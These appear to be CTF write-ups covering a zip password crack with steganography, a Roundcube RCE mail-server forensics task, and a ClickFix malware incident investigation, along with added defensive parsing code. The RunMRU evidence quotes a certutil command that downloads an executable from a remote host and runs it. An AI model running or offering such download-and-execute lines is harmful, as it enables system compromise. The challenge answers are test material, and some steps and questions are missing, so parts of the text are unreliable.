We are given a password-protected .zip archive, which we will crack with John the Ripper.
```sh
$ zip2john 'Secret.zip' > 'zip.hash' && john --wordlist='/usr/share/wordlists/rockyou.txt' 'zip.hash'
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ryancolin1       (Secret.zip/unknown.png)
1g 0:00:00:00 DONE (2025-11-12 17:41) 3.846g/s 15879Kp/s 15879Kc/s 15879KC/s s-dub30..rubyredcamry
Use the "--show" option to display all of the cracked passwords reliably
Session completed
```
The password is ryancolin1. Extracting the archive gives us the file unknown.png, but its header has been modified.
We can see a strange artifact in the top-left corner of the image.
Slightly editing the image gives us the flag.
::: info Note
The intended method is to view the blue bit plane of the image.
:::
Flag: PIS{h4ll0w33n_1s_f4n!!!}
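As an added example (not part of the write-up), here is how the bit-plane view mentioned in the note can be computed by hand. The pixel data is a constructed in-memory RGB image rather than unknown.png, so the block runs without any imaging library; with Pillow installed the same functions work on `list(Image.open(path).convert("RGB").getdata())` with `width = Image.open(path).size[0]`.

```python
# Added example: compute a single bit plane of one colour channel. Pixels are
# (R, G, B) tuples in row-major order; the sample image below is constructed
# here, it is not the challenge's unknown.png.

def bit_plane(pixels, width, channel, bit):
    """Return bit `bit` (0 = least significant .. 7 = most significant) of
    channel `channel` (0 = red, 1 = green, 2 = blue) as a list of rows of 0/1."""
    rows = []
    for start in range(0, len(pixels), width):
        rows.append([(px[channel] >> bit) & 1 for px in pixels[start:start + width]])
    return rows

def render(plane):
    """ASCII view of a plane: set bits as '#', cleared bits as '.'."""
    return "\n".join("".join("#" if b else "." for b in row) for row in plane)

def fill_ratio(plane):
    """Fraction of set bits. A plane carrying an embedded pattern tends to sit
    far from the roughly 0.5 of a noisy low-order plane of a natural photo."""
    total = sum(len(row) for row in plane)
    return sum(sum(row) for row in plane) / total

def hide_in_blue_lsb(pattern):
    """Constructed sample: a flat grey image whose blue LSB carries `pattern`
    (rows of 0/1). 0x80 and 0x81 are indistinguishable to the eye."""
    return [(0x80, 0x80, 0x80 | bit) for row in pattern for bit in row]

SAMPLE_PATTERN = [
    [1, 1, 1, 0, 1, 0, 1],
    [1, 0, 1, 0, 1, 0, 1],
    [1, 1, 1, 0, 1, 1, 1],
    [1, 0, 0, 0, 0, 0, 1],
    [1, 0, 0, 0, 0, 0, 1],
]
SAMPLE_WIDTH = len(SAMPLE_PATTERN[0])
SAMPLE_PIXELS = hide_in_blue_lsb(SAMPLE_PATTERN)

def all_planes(pixels, width):
    """Fill ratio of every (channel, bit) plane, the way a stego viewer walks
    through all 24 planes so the odd one stands out."""
    out = {}
    for channel in range(3):
        for bit in range(8):
            out[(channel, bit)] = fill_ratio(bit_plane(pixels, width, channel, bit))
    return out

if __name__ == "__main__":
    print(render(bit_plane(SAMPLE_PIXELS, SAMPLE_WIDTH, 2, 0)))
    for (ch, b), r in sorted(all_planes(SAMPLE_PIXELS, SAMPLE_WIDTH).items()):
        print(f"channel {ch} bit {b}: {r:.2f}")
```

On the constructed image every plane is uniformly all-zero or all-one except the blue LSB, which is exactly the situation in which a viewer that cycles through planes makes hidden content pop out.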
Foothold
Flag format: PIS{CVE_HOST:PORT_/path/to/persistence}
This is a mail server that we need to check for a security breach.
Checking /var/mail/root gives us an email that was sent to the Forensics Team, which reads:
```text
From www-data@forensicLab.com Mon Nov 3 13:34:51 2025
Return-Path: <www-data@forensicLab.com>
X-Original-To: root
Delivered-To: root@forensicLab.com
Received: by mailserver.localdomain (Postfix, from userid 33)
        id 10F90121456; Mon, 3 Nov 2025 13:34:50 +0000 (UTC)
To: root@forensicLab.com
From: www-data@forensicLab.com
Auto-Submitted: auto-generated
Subject: *** SECURITY information for mailserver ***
Message-Id: <20251103133451.10F90121456@mailserver.localdomain>
Date: Mon, 3 Nov 2025 13:34:50 +0000 (UTC)

mailserver : Nov 3 13:34:50 : www-data : user NOT in sudoers ; TTY=pts/1 ; PWD=/var/www/html/roundcube ; USER=root ; COMMAND=/usr/bin/crontab -
```
This tells us that the www-data user exploited Roundcube on the mail server and then tried to set up a crontab as root, which sudo denied because www-data is not in sudoers.
A quick look inside /var/www/html/ shows that the server runs Roundcube 1.6.10. A quick search on the internet gives us this Remote Code Execution CVE:
```text
CVE-2025-49113 – Roundcube 1.6.10 Authenticated Remote Code Execution

⚠️ Disclaimer
This repository is intended strictly for educational and research purposes.
All demonstrations were performed in a controlled lab environment.
Unauthorized testing or exploitation of systems without explicit permission is illegal and unethical. The author is not responsible for any misuse of this information.

📌 What Is Roundcube?
Roundcube is a widely used, browser-based IMAP email client written in PHP. It provides a user-friendly interface for webmail access and is commonly deployed by hosting providers, academic institutions, and internal enterprise mail servers.

🚨 About the Vulnerability
CVE-2025-49113 is a vulnerability affecting Roundcube version 1.6.10 that allows an authenticated user to achieve remote code execution (RCE) by submitting a crafted command through the webmail interface.
Successful exploitation requires valid user credentials. Once exploited, it grants system-level command execution based on the web server's context.

CVE ID: CVE-2025-49113
Affected Application: Roundcube 1.6.10
Vulnerability Type: Authenticated Remote Code Execution
Exploit Type: Reverse Shell via PHP Payload
Exploit Availability: Public GitHub PoC
```
This command opens port 4444 on 192.168.75.137, which gives us the initial access address.
Going back to the email, we also know that www-data created a crontab, which on Linux is most likely stored under /var/spool/cron/crontabs/.
Inside is a crontab that reads:
```cron
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (- installed on Mon Nov  3 13:35:29 2025)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
*/5 * * * * /tmp/beacon001 >/dev/null 2>&1
```
This crontab executes the binary /tmp/beacon001 every 5 minutes.
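As an added example (not a tool from the write-up), here is a small user-crontab parser that turns the schedule field into plain English and flags the traits a responder would pull this entry for: a binary run from a world-writable directory and output discarded. The crontab text is the entry recovered above; the heuristics are the example's own.

```python
# Added example: parse a user crontab and flag persistence indicators.
import re

# The crontab recovered from /var/spool/cron/crontabs/ above
SAMPLE_CRONTAB = """\
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (- installed on Mon Nov  3 13:35:29 2025)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
*/5 * * * * /tmp/beacon001 >/dev/null 2>&1
"""

FIELDS = ("minute", "hour", "day_of_month", "month", "day_of_week")
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

def parse_crontab(text):
    """One dict per job line; comments, blanks and VAR=value lines are skipped."""
    jobs = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        first = line.split(None, 1)[0]
        if "=" in first:                       # environment assignment, e.g. MAILTO=
            continue
        if first.startswith("@"):              # @reboot, @hourly, ...
            job = {"schedule": first, "command": line.split(None, 1)[1]}
        else:
            parts = line.split(None, 5)
            if len(parts) < 6:
                continue
            job = dict(zip(FIELDS, parts[:5]))
            job["schedule"] = " ".join(parts[:5])
            job["command"] = parts[5]
        job["line"] = lineno
        jobs.append(job)
    return jobs

def describe_schedule(job):
    """Plain-English description for the common shapes; otherwise the raw fields."""
    if job["schedule"].startswith("@"):
        return job["schedule"]
    rest_is_star = all(job[f] == "*" for f in FIELDS[1:])
    m = re.fullmatch(r"\*/(\d+)", job["minute"])
    if m and rest_is_star:
        return f"every {m.group(1)} minutes"
    if job["minute"] == "*" and rest_is_star:
        return "every minute"
    return job["schedule"]

def persistence_indicators(job):
    """Reasons a responder would look at this job more closely."""
    cmd = job["command"]
    target = cmd.split()[0]
    reasons = []
    if target.startswith(WRITABLE_DIRS):
        reasons.append(f"runs a binary from world-writable {target.rsplit('/', 1)[0]}/")
    if re.search(r">\s*/dev/null\s+2>&1|&>\s*/dev/null", cmd):
        reasons.append("discards all output")
    if re.search(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b", cmd):
        reasons.append("pipes a download into a shell")
    if job["schedule"] == "@reboot":
        reasons.append("runs at every boot")
    return reasons

def triage(text):
    """(schedule description, command, indicators) for every job in the file."""
    return [(describe_schedule(j), j["command"], persistence_indicators(j))
            for j in parse_crontab(text)]

if __name__ == "__main__":
    for sched, cmd, reasons in triage(SAMPLE_CRONTAB):
        print(f"{sched}: {cmd}")
        for r in reasons:
            print(f"    - {r}")
```

The same function applies to the system crontab files under /etc/cron.d, except that those carry an extra user field between the schedule and the command.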
Uploading beacon001 to VirusTotal tells us that this file is malicious.
Combine all the elements together to get the flag.
After that, we can enter our password into the PasteBin link to get the flag.
::: info Note
If you can't access PasteBin, you can use this frontend to access the flag.
:::
Flag: PIS{fr0m_f4n_n3r0_w1th_l0v3}
FixFixFix
Dear IR Team,
A client reported system issues after encountering an online verification page during normal web browsing. Following interaction with this interface, their workstation showed signs of compromise.
We detected suspicious activities including unusual process executions, external network connections, and system configuration changes. Evidence suggests malware installation with persistence mechanisms and credential harvesting capabilities.
The device is isolated. Please investigate.
We are given a Raw Disk Image, a Memory Dump and a Packet Capture.
Question 1
What initial access technique was used to lure the user to deploy the malware?
Looking at the thumbnail image, we can see that this site is mimicking Google's CAPTCHA to trick the user into executing malicious code.
According to MITRE ATT&CK:
An adversary may rely upon a user copying and pasting code in order to gain execution. Users may be subjected to social engineering to get them to copy and paste code directly into a Command and Scripting Interpreter. One such strategy is “ClickFix,” in which adversaries present users with seemingly helpful solutions—such as prompts to fix errors or complete CAPTCHAs—that instead instruct the user to copy and paste malicious code.
Answer: ClickFix.
Question 2
What is the exact date and time of initial compromise?
We know that the user executed a command by launching a terminal, pasting the malicious PowerShell code and executing it. We can extract the time from the RunMRU key in the NTUSER.DAT registry hive.
```text
RunMru
Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
LastWrite Time 2025-11-09 01:02:22Z
MRUList = a
a   cmd.exe /c certutil -urlcache -split -f "http://192.168.20.3/cailonmemay.exe" "%TEMP%\svhost.exe" && "%TEMP%\svhost.exe" && timeout 3\1
```
We can see the Last Write Time was at 2025-11-09 01:02:22.
Answer: 2025-11-09 01:02:22.
Question 3
What is the MITRE ATT&CK ID of the 1st stage downloader?
According to Microsoft:
This malware is used to download another malware
A quick lookup gives us this information from MITRE ATT&CK:
Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp. Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer).
This is found under ID T1105.
Answer: T1105.
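As an added example (not from the write-up) covering both the RunMRU evidence in Question 2 and the T1105 classification in Question 3: the RunMRU values can be walked programmatically, since MRUList lists the entries most-recent-first and each entry carries a trailing `\1`, and the recovered command can then be matched against the built-in Windows download utilities to label the first-stage downloader. The value dictionary is transcribed from the output above; the patterns are the example's own.

```python
# Added example: order RunMRU entries and label the downloader stage.
import re

# Transcribed from the RegRipper output above: value name -> data
RUNMRU_SAMPLE = {
    "MRUList": "a",
    "a": 'cmd.exe /c certutil -urlcache -split -f "http://192.168.20.3/cailonmemay.exe" '
         '"%TEMP%\\svhost.exe" && "%TEMP%\\svhost.exe" && timeout 3\\1',
}

def runmru_entries(values):
    """Commands in MRUList order (most recent first) with the trailing '\\1' removed."""
    entries = []
    for letter in values.get("MRUList", ""):
        raw = values.get(letter)
        if raw is None:
            continue
        entries.append((letter, raw[:-2] if raw.endswith("\\1") else raw))
    return entries

# Built-in utilities commonly used to fetch a second stage (Ingress Tool Transfer, T1105)
DOWNLOAD_PATTERNS = (
    (r"\bcertutil(\.exe)?\b.*-urlcache\b.*-f\b", "certutil -urlcache download"),
    (r"\bbitsadmin(\.exe)?\b.*/transfer\b", "bitsadmin transfer"),
    (r"\b(curl|wget)(\.exe)?\b", "curl/wget download"),
    (r"Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile", "PowerShell web download"),
)

def classify(cmd):
    """Label the downloader, pull out URLs and quoted Windows paths, count chained steps."""
    methods = [label for pat, label in DOWNLOAD_PATTERNS if re.search(pat, cmd, re.IGNORECASE)]
    return {
        "technique": "T1105" if methods else None,
        "methods": methods,
        "urls": re.findall(r"https?://[^\s\"']+", cmd),
        "paths": re.findall(r'"([^"]*\\[^"]*)"', cmd),   # quoted strings containing a backslash
        "chained_steps": cmd.count("&&") + 1,
    }

def triage_runmru(values):
    """(entry letter, command, classification) for every RunMRU entry, newest first."""
    return [(letter, cmd, classify(cmd)) for letter, cmd in runmru_entries(values)]

if __name__ == "__main__":
    for letter, cmd, info in triage_runmru(RUNMRU_SAMPLE):
        print(letter, info["technique"], info["methods"], info["urls"], info["paths"])
```

The key's LastWrite time dates only the most recent entry, so when MRUList holds several letters the timestamp belongs to the first one in that order.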
Question 4
When was the malware first executed on the system?
Windows Defender detected a registry change on HKCU@S-1-5-21-3558265190-190559637-539419846-1000\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\\SHELL
What is the MITRE ATT&CK ID of the persistence technique?
A quick lookup gives us the Winlogon Helper DLL persistence technique. According to MITRE ATT&CK:
Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\Software[\Wow6432Node\]\Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are used to manage additional helper programs and functionalities that support Winlogon.
This technique falls under ID: T1547.004.
Answer: T1547.004.
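As an added example (not from the write-up), here is the check a responder would script for the Winlogon values the Defender alert points at: the HKLM Shell and Userinit values are compared with their stock defaults, and any Shell or Userinit value under HKCU is reported simply because those are not set by default and Winlogon honours them for that user. The inputs are plain dictionaries of value name to data; the suspicious sample is constructed with a placeholder path, not the value from the case.

```python
# Added example: audit Winlogon values for the T1547.004 persistence pattern.

EXPECTED_HKLM = {
    "Shell": "explorer.exe",
    "Userinit": r"C:\Windows\system32\userinit.exe,",
}
# Not present by default under HKCU; if present, Winlogon uses them for that user
UNEXPECTED_HKCU = ("Shell", "Userinit")

def _norm(value):
    return value.strip().strip('"').lower()

def audit_winlogon(hklm, hkcu):
    """hklm/hkcu: {value name: data} read from ...\\Winlogon. Returns a list of
    findings; an empty list means both keys look stock."""
    findings = []
    for name, expected in EXPECTED_HKLM.items():
        data = hklm.get(name)
        if data is None:
            findings.append({"hive": "HKLM", "value": name, "data": None,
                             "reason": "expected value missing"})
        elif _norm(data) != _norm(expected):
            findings.append({"hive": "HKLM", "value": name, "data": data,
                             "reason": f"differs from default {expected!r}"})
    for name in UNEXPECTED_HKCU:
        if name in hkcu:
            findings.append({"hive": "HKCU", "value": name, "data": hkcu[name],
                             "reason": "per-user override present (not set by default)"})
    for f in findings:
        f["technique"] = "T1547.004"
    return findings

# Constructed samples: a stock HKLM key, an empty HKCU key, and an HKCU key with
# a placeholder program appended to the shell (not the value from the case)
HKLM_STOCK = {"Shell": "explorer.exe", "Userinit": r"C:\Windows\system32\userinit.exe,"}
HKCU_STOCK = {}
HKCU_SUSPECT = {"Shell": r"explorer.exe,C:\Users\victim\AppData\Local\Temp\placeholder.exe"}

if __name__ == "__main__":
    for f in audit_winlogon(HKLM_STOCK, HKCU_SUSPECT):
        print(f"[{f['technique']}] {f['hive']}\\...\\Winlogon\\{f['value']} = {f['data']!r}: {f['reason']}")
```

On a live system the two dictionaries come from `winreg` (or from the SOFTWARE and NTUSER.DAT hives offline); the comparison is case-insensitive because the registry is, so a value like `Explorer.exe` is not a finding.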
Question 9
What IP address and port was used for C2 communications?
Looking at the VirusTotal analysis again:
The malware makes HTTP requests only to 192.168.20.3:8888 to communicate.
Sliver uses file extensions to determine what type of request is being made:
- .woff – Used for stagers
- .html – Key exchange messages
- .js – Long poll messages
- .php – Session messages
- .png – Close session messages
Inspecting our packet capture again, this was the first C2 command:
This C2 command was sent at:
Answer: 2025-11-09 01:02:30.
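As an added example (not from the write-up), the extension mapping above can be turned into a small classifier over an HTTP request log: each request target is mapped to a Sliver message type, requests are grouped per destination, and a destination counts as likely C2 only when a key exchange is followed by polling or session traffic, so a stray .html or .png hit from normal browsing is not flagged. The request tuples are constructed and use a documentation-range address for the unrelated site; they are not taken from the challenge's pcap.

```python
# Added example: classify HTTP requests by Sliver's extension convention.
from urllib.parse import urlsplit
import posixpath

# Sliver HTTP(S) C2 message types by request extension, as listed above
SLIVER_EXTENSIONS = {
    ".woff": "stager",
    ".html": "key exchange",
    ".js": "long poll",
    ".php": "session message",
    ".png": "close session",
}

# Constructed request log: (timestamp, destination host:port, request target)
SAMPLE_REQUESTS = [
    ("2025-11-09 01:02:29", "192.168.20.3:8888", "/fonts/main.woff"),
    ("2025-11-09 01:02:30", "192.168.20.3:8888", "/auth/login.html?_=8421"),
    ("2025-11-09 01:02:31", "192.168.20.3:8888", "/api/v1/bootstrap.js"),
    ("2025-11-09 01:02:33", "192.168.20.3:8888", "/app/index.php"),
    ("2025-11-09 01:02:35", "203.0.113.10:80", "/index.html"),        # unrelated browsing
    ("2025-11-09 01:02:40", "192.168.20.3:8888", "/static/logo.png"),
]

def classify_request(target):
    """Sliver message type for a request target, or None for other extensions."""
    path = urlsplit(target).path
    ext = posixpath.splitext(path)[1].lower()
    return SLIVER_EXTENSIONS.get(ext)

def sliver_sessions(requests):
    """{destination: [(timestamp, type, target), ...]} in time order, Sliver-shaped requests only."""
    by_dst = {}
    for ts, dst, target in sorted(requests):
        kind = classify_request(target)
        if kind:
            by_dst.setdefault(dst, []).append((ts, kind, target))
    return by_dst

def likely_c2(requests):
    """Destinations showing the handshake shape: key exchange, then polling or session traffic."""
    c2 = []
    for dst, events in sliver_sessions(requests).items():
        kinds = [k for _, k, _ in events]
        if "key exchange" not in kinds:
            continue
        after = kinds[kinds.index("key exchange"):]
        if any(k in ("long poll", "session message") for k in after):
            c2.append(dst)
    return c2

def first_event(requests, dst, kind):
    """Timestamp of the first request of the given type to `dst`, or None."""
    for ts, k, _ in sliver_sessions(requests).get(dst, []):
        if k == kind:
            return ts
    return None

if __name__ == "__main__":
    for dst in likely_c2(SAMPLE_REQUESTS):
        print(dst, "key exchange at", first_event(SAMPLE_REQUESTS, dst, "key exchange"))
```

Feeding it real traffic is a matter of exporting the HTTP request list from the capture (for example the timestamp, destination and request URI columns) into the same tuples; TLS-wrapped Sliver traffic would not expose the paths and needs the JA3/JA4 or beacon-interval angle instead.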
Question 11
How many different commands did the attacker execute?
```sh
$ pyinstxtractor.py 'concacbamay.exe'
[+] Processing concacbamay.exe
[+] Pyinstaller version: 2.1+
[+] Python version: 3.13
[+] Length of package: 16036748 bytes
[+] Found 115 files in CArchive
[+] Beginning extraction...please standby
[+] Possible entry point: pyiboot01_bootstrap.pyc
[+] Possible entry point: pyi_rth_inspect.pyc
[+] Possible entry point: pyi_rth_pkgutil.pyc
[+] Possible entry point: pyi_rth_multiprocessing.pyc
[+] Possible entry point: pyi_rth_cryptography_openssl.pyc
[+] Possible entry point: pyi_rth_setuptools.pyc
[+] Possible entry point: pyi_rth_pkgres.pyc
[+] Possible entry point: mal.pyc
[+] Found 787 files in PYZ archive
[!] Error: Failed to decompress PYZ.pyz_extracted/jaraco.pyc, probably encrypted. Extracting as is.
[!] Error: Failed to decompress PYZ.pyz_extracted/setuptools/_distutils/compilers.pyc, probably encrypted. Extracting as is.
[!] Error: Failed to decompress PYZ.pyz_extracted/setuptools/_distutils/compilers/C.pyc, probably encrypted. Extracting as is.
[!] Error: Failed to decompress PYZ.pyz_extracted/setuptools/_vendor.pyc, probably encrypted. Extracting as is.
[!] Error: Failed to decompress PYZ.pyz_extracted/setuptools/_vendor/jaraco.pyc, probably encrypted. Extracting as is.
[+] Successfully extracted pyinstaller archive: concacbamay.exe

You can now use a python decompiler on the pyc files within the extracted directory.
```
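As an added example (not from the write-up), here is what to do with an extracted .pyc such as mal.pyc before reaching for a decompiler: read the 16-byte header to confirm which interpreter wrote it (marshalled code from another Python version does not load reliably, so the analysis interpreter must match the 3.13 reported above), then load the code object and list its string constants and referenced names directly, which is often enough to enumerate the commands a sample can run even when no decompiler supports that version. The module compiled below is a constructed stand-in, not the challenge's mal.pyc.

```python
# Added example: inspect a .pyc with the standard library only.
import dis
import importlib.util
import marshal
import struct
import types

# Constructed stand-in for an extracted module (NOT the challenge's mal.pyc)
SAMPLE_SOURCE = '''
import subprocess
COMMANDS = ["whoami", "ipconfig /all", "net user", "tasklist"]

def run(cmd):
    return subprocess.run(cmd, shell=True, capture_output=True).stdout

def main():
    for c in COMMANDS:
        run(c)
'''

def build_pyc(source, filename="sample.py"):
    """Lay out a timestamp-based .pyc the way the interpreter writes it:
    4-byte magic, 4-byte flags, 4-byte mtime, 4-byte source size, marshalled code."""
    code = compile(source, filename, "exec")
    header = importlib.util.MAGIC_NUMBER + struct.pack("<III", 0, 0, len(source))
    return header + marshal.dumps(code)

SAMPLE_PYC = build_pyc(SAMPLE_SOURCE)

def pyc_header(data):
    """Which interpreter wrote the file, checked before any attempt to load it."""
    magic = data[:4]
    flags, = struct.unpack("<I", data[4:8])
    return {
        "magic": magic.hex(),
        "matches_running_interpreter": magic == importlib.util.MAGIC_NUMBER,
        "hash_based": bool(flags & 0x1),
    }

def load_code(data):
    return marshal.loads(data[16:])

def walk_code(code):
    """The module code object and every nested function/class body."""
    yield code
    for const in code.co_consts:
        if isinstance(const, types.CodeType):
            yield from walk_code(const)

def _flatten(const):
    # Constant lists/tuples are stored as a single tuple constant; descend into them
    if isinstance(const, (tuple, frozenset)):
        for item in const:
            yield from _flatten(item)
    else:
        yield const

def string_constants(data):
    """All string literals in the module, in first-seen order."""
    seen = []
    for co in walk_code(load_code(data)):
        for const in co.co_consts:
            for item in _flatten(const):
                if isinstance(item, str) and item not in seen:
                    seen.append(item)
    return seen

def referenced_names(data):
    """Per code object, the global and attribute names it touches (imports, calls, attributes)."""
    return {co.co_name: list(co.co_names) for co in walk_code(load_code(data))}

if __name__ == "__main__":
    print(pyc_header(SAMPLE_PYC))
    print(string_constants(SAMPLE_PYC))
    print(referenced_names(SAMPLE_PYC))
    dis.dis(load_code(SAMPLE_PYC))   # the bytecode itself, readable without a decompiler
```

Run it under the interpreter version the header reports; if `matches_running_interpreter` is False, `load_code` is the step that will fail or mislead.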
This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License. Please attribute the source, use non-commercially, and maintain the same license.